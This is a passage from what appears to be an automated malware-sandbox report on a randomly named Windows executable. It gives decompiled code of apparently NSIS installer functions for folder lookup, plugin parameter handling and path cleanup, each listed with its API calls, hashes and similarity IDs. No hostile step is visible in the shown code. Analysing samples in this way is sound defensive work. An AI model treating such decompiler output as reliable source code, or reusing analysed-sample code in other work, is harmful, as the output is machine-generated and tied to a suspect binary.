							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405BBA(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422ee0;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x425000;
							E00405B98(_t86, (_t95 << 0xa) + 0x425000);
						} else {
							E00405AF6(_t86,  *0x423f48);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405DFA(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423fc4;
						if( *0x423fc4 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423f44;
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423f48,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423f48,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423f78;
							E00405A7F(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423f78, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405BBA(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405B98(_a4, _t37);
			}




























                                                                                                                          0x00405bba
                                                                                                                          0x00405bba
                                                                                                                          0x00405bba
                                                                                                                          0x00405bc0
                                                                                                                          0x00405bc5
                                                                                                                          0x00405bd6
                                                                                                                          0x00405bd6
                                                                                                                          0x00405be1
                                                                                                                          0x00405be3
                                                                                                                          0x00405be8
                                                                                                                          0x00405beb
                                                                                                                          0x00405bec
                                                                                                                          0x00405bf3
                                                                                                                          0x00405bf5
                                                                                                                          0x00405bfb
                                                                                                                          0x00405bfe
                                                                                                                          0x00405bfe
                                                                                                                          0x00405dd7
                                                                                                                          0x00405dd7
                                                                                                                          0x00405ddb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405c0b
                                                                                                                          0x00405c11
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405c17
                                                                                                                          0x00405c18
                                                                                                                          0x00405c1b
                                                                                                                          0x00405c1e
                                                                                                                          0x00405dca
                                                                                                                          0x00405dd4
                                                                                                                          0x00405dd6
                                                                                                                          0x00405dd6
                                                                                                                          0x00405dcc
                                                                                                                          0x00405dce
                                                                                                                          0x00405dd0
                                                                                                                          0x00405dd1
                                                                                                                          0x00405dd1
                                                                                                                          0x00000000
                                                                                                                          0x00405dca
                                                                                                                          0x00405c24
                                                                                                                          0x00405c28
                                                                                                                          0x00405c38
                                                                                                                          0x00405c3c
                                                                                                                          0x00405c43
                                                                                                                          0x00405c46
                                                                                                                          0x00405c4a
                                                                                                                          0x00405c50
                                                                                                                          0x00405c53
                                                                                                                          0x00405c56
                                                                                                                          0x00405c59
                                                                                                                          0x00405d74
                                                                                                                          0x00405d77
                                                                                                                          0x00405da7
                                                                                                                          0x00405daa
                                                                                                                          0x00405daf
                                                                                                                          0x00405db3
                                                                                                                          0x00405db3
                                                                                                                          0x00405db8
                                                                                                                          0x00405db9
                                                                                                                          0x00405dbe
                                                                                                                          0x00405dc1
                                                                                                                          0x00405dc3
                                                                                                                          0x00000000
                                                                                                                          0x00405dc3
                                                                                                                          0x00405d79
                                                                                                                          0x00405d7c
                                                                                                                          0x00405d91
                                                                                                                          0x00405d98
                                                                                                                          0x00405d7e
                                                                                                                          0x00405d85
                                                                                                                          0x00405d85
                                                                                                                          0x00405da0
                                                                                                                          0x00405da3
                                                                                                                          0x00405d6c
                                                                                                                          0x00405d6d
                                                                                                                          0x00405d6d
                                                                                                                          0x00000000
                                                                                                                          0x00405da3
                                                                                                                          0x00405c61
                                                                                                                          0x00405c62
                                                                                                                          0x00405c68
                                                                                                                          0x00405c6a
                                                                                                                          0x00405c84
                                                                                                                          0x00405c84
                                                                                                                          0x00405c8b
                                                                                                                          0x00405c8b
                                                                                                                          0x00405c92
                                                                                                                          0x00405c96
                                                                                                                          0x00405c96
                                                                                                                          0x00405c97
                                                                                                                          0x00405c99
                                                                                                                          0x00405cd2
                                                                                                                          0x00405cd5
                                                                                                                          0x00405ce5
                                                                                                                          0x00405ce8
                                                                                                                          0x00405cf0
                                                                                                                          0x00405cf6
                                                                                                                          0x00405cf6
                                                                                                                          0x00405d52
                                                                                                                          0x00405d52
                                                                                                                          0x00405d54
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405cfa
                                                                                                                          0x00405d01
                                                                                                                          0x00405d02
                                                                                                                          0x00405d04
                                                                                                                          0x00405d1e
                                                                                                                          0x00405d2c
                                                                                                                          0x00405d32
                                                                                                                          0x00405d34
                                                                                                                          0x00405d4f
                                                                                                                          0x00405d4f
                                                                                                                          0x00405d4f
                                                                                                                          0x00000000
                                                                                                                          0x00405d4f
                                                                                                                          0x00405d3a
                                                                                                                          0x00405d45
                                                                                                                          0x00405d4b
                                                                                                                          0x00405d4d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405d4d
                                                                                                                          0x00405d06
                                                                                                                          0x00405d09
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405d18
                                                                                                                          0x00405d1a
                                                                                                                          0x00405d1c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405d1c
                                                                                                                          0x00000000
                                                                                                                          0x00405d52
                                                                                                                          0x00405cdd
                                                                                                                          0x00000000
                                                                                                                          0x00405c9b
                                                                                                                          0x00405ca0
                                                                                                                          0x00405cb6
                                                                                                                          0x00405cbb
                                                                                                                          0x00405cbe
                                                                                                                          0x00405d5b
                                                                                                                          0x00405d5b
                                                                                                                          0x00405d5f
                                                                                                                          0x00405d67
                                                                                                                          0x00405d67
                                                                                                                          0x00000000
                                                                                                                          0x00405d5f
                                                                                                                          0x00405cc8
                                                                                                                          0x00405d56
                                                                                                                          0x00405d56
                                                                                                                          0x00405d59
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405d59
                                                                                                                          0x00405c99
                                                                                                                          0x00405c6c
                                                                                                                          0x00405c70
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405c72
                                                                                                                          0x00405c76
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405c78
                                                                                                                          0x00405c7c
                                                                                                                          0x00000000
                                                                                                                          0x00405c7e
                                                                                                                          0x00405c7e
                                                                                                                          0x00000000
                                                                                                                          0x00405c7e
                                                                                                                          0x00405c7c
                                                                                                                          0x00405de1
                                                                                                                          0x00405deb
                                                                                                                          0x00405df7
                                                                                                                          0x00405df7
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetVersion.KERNEL32(?,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405C62
                                                                                                                          • GetSystemDirectoryA.KERNEL32 ref: 00405CDD
                                                                                                                          • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405CF0
                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,0040F0E0), ref: 00405D2C
                                                                                                                          • SHGetPathFromIDListA.SHELL32(0040F0E0,Call), ref: 00405D3A
                                                                                                                          • CoTaskMemFree.OLE32(0040F0E0), ref: 00405D45
                                                                                                                          • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D67
                                                                                                                          • lstrlenA.KERNEL32(Call,?,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405DB9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                          • API String ID: 900638850-1230650788
                                                                                                                          • Opcode ID: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                                                                                                          • Instruction ID: c09fc2b2839bb59ef3d9b0e1161cb0e194e2e056f91f07e7f33828596fbb00b3
                                                                                                                          • Opcode Fuzzy Hash: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                                                                                                          • Instruction Fuzzy Hash: CE51F331A04A05AAEF215F648C88BBF3B74EF05714F10827BE911B62E0D27C5942DF5E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100025FE, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 127COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 43%
                                                                                                                          			E100025FE(void* __edx, intOrPtr* _a4) {
				char _v80;
				intOrPtr _v84;
				char _v92;
				intOrPtr* _t20;
				intOrPtr _t23;
				void* _t25;
				CHAR* _t26;
				void* _t27;
				void* _t32;
				void* _t34;
				void* _t36;
				intOrPtr _t38;
				void* _t41;
				intOrPtr _t42;
				void* _t44;
				char* _t45;
				int _t48;
				int _t49;
				void* _t53;
				intOrPtr _t54;
				CHAR** _t57;
				CHAR** _t58;
				void* _t59;
				void* _t60;

				_t53 = __edx;
				_t60 =  &_v84;
				_t20 = _a4;
				_t54 =  *((intOrPtr*)(_t20 + 0x814));
				_v84 = _t54;
				_t57 = (_t54 + 0x41 << 5) + _t20;
				do {
					if( *((intOrPtr*)(_t57 - 4)) != 0xffffffff) {
						_t58 = _t57;
					} else {
						_t58 =  *_t57;
					}
					_t59 = E10001541();
					_t48 = 0;
					_t23 =  *((intOrPtr*)(_t57 - 8));
					if(_t23 == 0) {
						lstrcpyA(_t59, 0x10004034);
					} else {
						_t32 = _t23 - 1;
						if(_t32 == 0) {
							_push( *_t58);
							goto L12;
						} else {
							_t34 = _t32 - 1;
							if(_t34 == 0) {
								E1000176C(_t53,  *_t58, _t58[1], _t59);
								goto L13;
							} else {
								_t36 = _t34 - 1;
								if(_t36 == 0) {
									_t49 = lstrlenA( *_t58);
									_t38 =  *0x10004058;
									if(_t49 >= _t38) {
										_t49 = _t38 - 1;
									}
									_t9 = _t49 + 1; // 0x1
									lstrcpynA(_t59,  *_t58, _t9);
									 *(_t49 + _t59) =  *(_t49 + _t59) & 0x00000000;
									_t48 = 0;
								} else {
									_t41 = _t36 - 1;
									if(_t41 == 0) {
										_t42 =  *0x10004058;
										_push(0);
										_push(0);
										_push(_t42);
										_push(_t59);
										_push(_t42);
										_push( *_t58);
										goto L16;
									} else {
										_t44 = _t41 - 1;
										if(_t44 == 0) {
											_t45 =  &_v80;
											_push(0x27);
											_push(_t45);
											_push( *_t58);
											" {*v@u*v"();
											_push(0);
											_push(0);
											_push( *0x10004058);
											_push(_t59);
											_push(_t45);
											_push( &_v92);
											L16:
											WideCharToMultiByte(_t48, _t48, ??, ??, ??, ??, ??, ??);
										} else {
											if(_t44 == 1) {
												_push( *_t57);
												L12:
												wsprintfA(_t59, 0x10004008);
												L13:
												_t60 = _t60 + 0xc;
											}
										}
									}
								}
							}
						}
					}
					_t25 = _t57[5];
					if(_t25 != _t48 && ( *_a4 != 2 ||  *((intOrPtr*)(_t57 - 4)) > _t48)) {
						GlobalFree(_t25);
					}
					_t26 = _t57[4];
					if(_t26 != _t48) {
						if(_t26 != 0xffffffff) {
							if(_t26 > _t48) {
								E1000160E(_t26 - 1, _t59);
								goto L32;
							}
						} else {
							E1000159E(_t59);
							L32:
						}
					}
					_t27 = GlobalFree(_t59);
					_v84 = _v84 - 1;
					_t57 = _t57 - 0x20;
				} while (_v84 >= _t48);
				return _t27;
			}



























                                                                                                                          0x100025fe
                                                                                                                          0x100025fe
                                                                                                                          0x10002601
                                                                                                                          0x10002609
                                                                                                                          0x1000260f
                                                                                                                          0x10002619
                                                                                                                          0x1000261b
                                                                                                                          0x1000261f
                                                                                                                          0x10002625
                                                                                                                          0x10002621
                                                                                                                          0x10002621
                                                                                                                          0x10002621
                                                                                                                          0x1000262c
                                                                                                                          0x10002631
                                                                                                                          0x10002633
                                                                                                                          0x10002635
                                                                                                                          0x100026ea
                                                                                                                          0x1000263b
                                                                                                                          0x1000263b
                                                                                                                          0x1000263c
                                                                                                                          0x100026dd
                                                                                                                          0x00000000
                                                                                                                          0x10002642
                                                                                                                          0x10002642
                                                                                                                          0x10002643
                                                                                                                          0x100026d6
                                                                                                                          0x00000000
                                                                                                                          0x10002649
                                                                                                                          0x10002649
                                                                                                                          0x1000264a
                                                                                                                          0x100026ad
                                                                                                                          0x100026af
                                                                                                                          0x100026b6
                                                                                                                          0x100026b8
                                                                                                                          0x100026b8
                                                                                                                          0x100026bb
                                                                                                                          0x100026c2
                                                                                                                          0x100026c8
                                                                                                                          0x100026cc
                                                                                                                          0x1000264c
                                                                                                                          0x1000264c
                                                                                                                          0x1000264d
                                                                                                                          0x1000268f
                                                                                                                          0x10002694
                                                                                                                          0x10002695
                                                                                                                          0x10002696
                                                                                                                          0x10002697
                                                                                                                          0x10002698
                                                                                                                          0x10002699
                                                                                                                          0x00000000
                                                                                                                          0x1000264f
                                                                                                                          0x1000264f
                                                                                                                          0x10002650
                                                                                                                          0x1000266f
                                                                                                                          0x10002673
                                                                                                                          0x10002675
                                                                                                                          0x10002676
                                                                                                                          0x10002678
                                                                                                                          0x1000267e
                                                                                                                          0x1000267f
                                                                                                                          0x10002680
                                                                                                                          0x10002686
                                                                                                                          0x10002687
                                                                                                                          0x1000268c
                                                                                                                          0x1000269b
                                                                                                                          0x1000269d
                                                                                                                          0x10002652
                                                                                                                          0x10002653
                                                                                                                          0x10002659
                                                                                                                          0x1000265b
                                                                                                                          0x10002661
                                                                                                                          0x10002667
                                                                                                                          0x10002667
                                                                                                                          0x10002667
                                                                                                                          0x10002653
                                                                                                                          0x10002650
                                                                                                                          0x1000264d
                                                                                                                          0x1000264a
                                                                                                                          0x10002643
                                                                                                                          0x1000263c
                                                                                                                          0x100026f0
                                                                                                                          0x100026f5
                                                                                                                          0x10002706
                                                                                                                          0x10002706
                                                                                                                          0x1000270c
                                                                                                                          0x10002711
                                                                                                                          0x10002716
                                                                                                                          0x10002722
                                                                                                                          0x10002727
                                                                                                                          0x00000000
                                                                                                                          0x1000272c
                                                                                                                          0x10002718
                                                                                                                          0x10002719
                                                                                                                          0x1000272d
                                                                                                                          0x1000272d
                                                                                                                          0x10002716
                                                                                                                          0x1000272f
                                                                                                                          0x10002735
                                                                                                                          0x10002739
                                                                                                                          0x1000273c
                                                                                                                          0x1000274d

                                                                                                                          APIs
                                                                                                                          • wsprintfA.USER32 ref: 10002661
                                                                                                                          • StringFromGUID2.OLE32(?,?,00000027,?,?,?,00000000), ref: 10002678
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,?,00000000), ref: 1000269D
                                                                                                                            • Part of subcall function 1000160E: lstrcpyA.KERNEL32(-10004047,00000000,?,1000118F,?,00000000), ref: 10001636
                                                                                                                          • GlobalFree.KERNEL32 ref: 10002706
                                                                                                                          • GlobalFree.KERNEL32 ref: 1000272F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.335998522.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.335961527.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.336004505.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.336018222.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeGlobal$ByteCharFromMultiStringWidelstrcpywsprintf
                                                                                                                          • String ID: {*v@u*v
                                                                                                                          • API String ID: 3910409330-3183337590
                                                                                                                          • Opcode ID: 87f5dfd5f3f98710c2d4cb889120a35c512483e8d73b73e88293233abc1def33
                                                                                                                          • Instruction ID: 01fa9c58c50faa9564c1a8f469434e2f7c3d79e669d628752182ef5a144b3071
                                                                                                                          • Opcode Fuzzy Hash: 87f5dfd5f3f98710c2d4cb889120a35c512483e8d73b73e88293233abc1def33
                                                                                                                          • Instruction Fuzzy Hash: C741BF7160460AEFFB12DF60CDC496BBBEDFB082D4B120525FA458615DCB32AC58DB21
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10002440, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 136memorystringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 91%
                                                                                                                          			E10002440(void* __edx, intOrPtr _a4) {
				signed int _v4;
				CHAR* _t32;
				intOrPtr _t33;
				void* _t34;
				void* _t36;
				void* _t43;
				void** _t49;
				CHAR* _t58;
				void* _t59;
				signed int* _t60;
				void* _t61;
				intOrPtr* _t62;
				CHAR* _t63;
				void* _t73;

				_t59 = __edx;
				_v4 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t62 = (_v4 << 5) + _t9;
					_t32 =  *(_t62 + 0x14);
					if(_t32 == 0) {
						goto L9;
					}
					_t58 = 0x1a;
					if(_t32 == _t58) {
						goto L9;
					}
					if(_t32 != 0xffffffff) {
						if(_t32 <= 0 || _t32 > 0x19) {
							 *(_t62 + 0x14) = _t58;
						} else {
							_t32 = E100015E5(_t32 - 1);
							L10:
						}
						goto L11;
					} else {
						_t32 = E10001561();
						L11:
						_t63 = _t32;
						_t13 = _t62 + 8; // 0x820
						_t60 = _t13;
						if( *((intOrPtr*)(_t62 + 4)) != 0xffffffff) {
							_t49 = _t60;
						} else {
							_t49 =  *_t60;
						}
						_t33 =  *_t62;
						 *(_t62 + 0x1c) =  *(_t62 + 0x1c) & 0x00000000;
						if(_t33 == 0) {
							 *_t60 =  *_t60 & 0x00000000;
						} else {
							if(_t33 == 1) {
								_t36 = E10001641(_t63);
								L27:
								 *_t49 = _t36;
								L31:
								_t34 = GlobalFree(_t63);
								if(_v4 == 0) {
									return _t34;
								}
								if(_v4 !=  *((intOrPtr*)(_a4 + 0x814))) {
									_v4 = _v4 + 1;
								} else {
									_v4 = _v4 & 0x00000000;
								}
								continue;
							}
							if(_t33 == 2) {
								 *_t49 = E10001641(_t63);
								_t49[1] = _t59;
								goto L31;
							}
							_t73 = _t33 - 3;
							if(_t73 == 0) {
								_t36 = E10001550(_t63);
								 *(_t62 + 0x1c) = _t36;
								goto L27;
							}
							if(_t73 > 0) {
								if(_t33 <= 5) {
									_t61 = GlobalAlloc(0x40,  *0x10004058 +  *0x10004058);
									 *(_t62 + 0x1c) = _t61;
									MultiByteToWideChar(0, 0, _t63,  *0x10004058, _t61,  *0x10004058);
									if( *_t62 != 5) {
										 *_t49 = _t61;
									} else {
										_t43 = GlobalAlloc(0x40, 0x10);
										 *(_t62 + 0x1c) = _t43;
										 *_t49 = _t43;
										__imp__CLSIDFromString(_t61, _t43);
										GlobalFree(_t61);
									}
								} else {
									if(_t33 == 6 && lstrlenA(_t63) > 0) {
										 *_t60 = E1000274E(E10001641(_t63));
									}
								}
							}
						}
						goto L31;
					}
					L9:
					_t32 = E10001550(0x10004034);
					goto L10;
				}
			}

















                                                                                                                          0x10002440
                                                                                                                          0x10002454
                                                                                                                          0x10002458
                                                                                                                          0x10002463
                                                                                                                          0x10002463
                                                                                                                          0x1000246a
                                                                                                                          0x1000246f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002473
                                                                                                                          0x10002476
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1000247b
                                                                                                                          0x10002486
                                                                                                                          0x10002496
                                                                                                                          0x1000248d
                                                                                                                          0x1000248f
                                                                                                                          0x100024a5
                                                                                                                          0x100024a5
                                                                                                                          0x00000000
                                                                                                                          0x1000247d
                                                                                                                          0x1000247d
                                                                                                                          0x100024a6
                                                                                                                          0x100024aa
                                                                                                                          0x100024ac
                                                                                                                          0x100024ac
                                                                                                                          0x100024af
                                                                                                                          0x100024b5
                                                                                                                          0x100024b1
                                                                                                                          0x100024b1
                                                                                                                          0x100024b1
                                                                                                                          0x100024b7
                                                                                                                          0x100024b9
                                                                                                                          0x100024bf
                                                                                                                          0x1000258a
                                                                                                                          0x100024c5
                                                                                                                          0x100024c8
                                                                                                                          0x10002583
                                                                                                                          0x1000256f
                                                                                                                          0x10002570
                                                                                                                          0x1000258d
                                                                                                                          0x1000258e
                                                                                                                          0x10002599
                                                                                                                          0x100025c3
                                                                                                                          0x100025c3
                                                                                                                          0x100025a9
                                                                                                                          0x100025b5
                                                                                                                          0x100025ab
                                                                                                                          0x100025ab
                                                                                                                          0x100025ab
                                                                                                                          0x00000000
                                                                                                                          0x100025a9
                                                                                                                          0x100024d1
                                                                                                                          0x1000257b
                                                                                                                          0x1000257d
                                                                                                                          0x00000000
                                                                                                                          0x1000257d
                                                                                                                          0x100024d7
                                                                                                                          0x100024da
                                                                                                                          0x10002567
                                                                                                                          0x1000256c
                                                                                                                          0x00000000
                                                                                                                          0x1000256c
                                                                                                                          0x100024e0
                                                                                                                          0x100024e9
                                                                                                                          0x10002525
                                                                                                                          0x10002527
                                                                                                                          0x10002537
                                                                                                                          0x10002540
                                                                                                                          0x10002562
                                                                                                                          0x10002542
                                                                                                                          0x10002546
                                                                                                                          0x1000254d
                                                                                                                          0x10002551
                                                                                                                          0x10002553
                                                                                                                          0x1000255a
                                                                                                                          0x1000255a
                                                                                                                          0x100024eb
                                                                                                                          0x100024ee
                                                                                                                          0x10002510
                                                                                                                          0x10002512
                                                                                                                          0x100024ee
                                                                                                                          0x100024e9
                                                                                                                          0x100024e0
                                                                                                                          0x00000000
                                                                                                                          0x100024bf
                                                                                                                          0x1000249b
                                                                                                                          0x100024a0
                                                                                                                          0x00000000
                                                                                                                          0x100024a0

                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(?), ref: 100024F5
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000251F
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 10002537
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 10002546
                                                                                                                          • CLSIDFromString.OLE32(00000000,00000000), ref: 10002553
                                                                                                                          • GlobalFree.KERNEL32 ref: 1000255A
                                                                                                                          • GlobalFree.KERNEL32 ref: 1000258E
                                                                                                                            • Part of subcall function 10001550: lstrcpyA.KERNEL32(00000000,?,10001607,?,100011A1,-000000A0), ref: 1000155A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.335998522.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.335961527.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.336004505.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.336018222.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpylstrlen
                                                                                                                          • String ID: @u*v
                                                                                                                          • API String ID: 520554397-1046951355
                                                                                                                          • Opcode ID: 4d2a09eee45eedff946f98fdd0adfb8314ee589d0cc0d31195a6165608b31656
                                                                                                                          • Instruction ID: b3baf62e5a9b027ff8c076c09efcd2265374c504b674d9c0734edd534e3ded0a
                                                                                                                          • Opcode Fuzzy Hash: 4d2a09eee45eedff946f98fdd0adfb8314ee589d0cc0d31195a6165608b31656
                                                                                                                          • Instruction Fuzzy Hash: BC41BA71505A02DFF320CF248C94B6AB7F8FB443E2F614919F946DA199DB70E8808B66
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405DFA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405DFA(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004056F8(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004056B6("*?|<>/\":", _t5))) == 0) {
							E00405830(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                                          0x00405dfc
                                                                                                                          0x00405e04
                                                                                                                          0x00405e18
                                                                                                                          0x00405e18
                                                                                                                          0x00405e1e
                                                                                                                          0x00405e2b
                                                                                                                          0x00405e2b
                                                                                                                          0x00405e2c
                                                                                                                          0x00405e2e
                                                                                                                          0x00405e32
                                                                                                                          0x00405e34
                                                                                                                          0x00405e3d
                                                                                                                          0x00405e3f
                                                                                                                          0x00405e59
                                                                                                                          0x00405e61
                                                                                                                          0x00405e61
                                                                                                                          0x00405e66
                                                                                                                          0x00405e68
                                                                                                                          0x00405e6a
                                                                                                                          0x00405e6e
                                                                                                                          0x00405e6f
                                                                                                                          0x00405e72
                                                                                                                          0x00405e7a
                                                                                                                          0x00405e7c
                                                                                                                          0x00405e80
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405e86
                                                                                                                          0x00405e8b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405e8b
                                                                                                                          0x00405e90

                                                                                                                          APIs
                                                                                                                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PQMW0W5h3X.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E52
                                                                                                                          • CharNextA.USER32(?,?,?,00000000), ref: 00405E5F
                                                                                                                          • CharNextA.USER32(?,"C:\Users\user\Desktop\PQMW0W5h3X.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E64
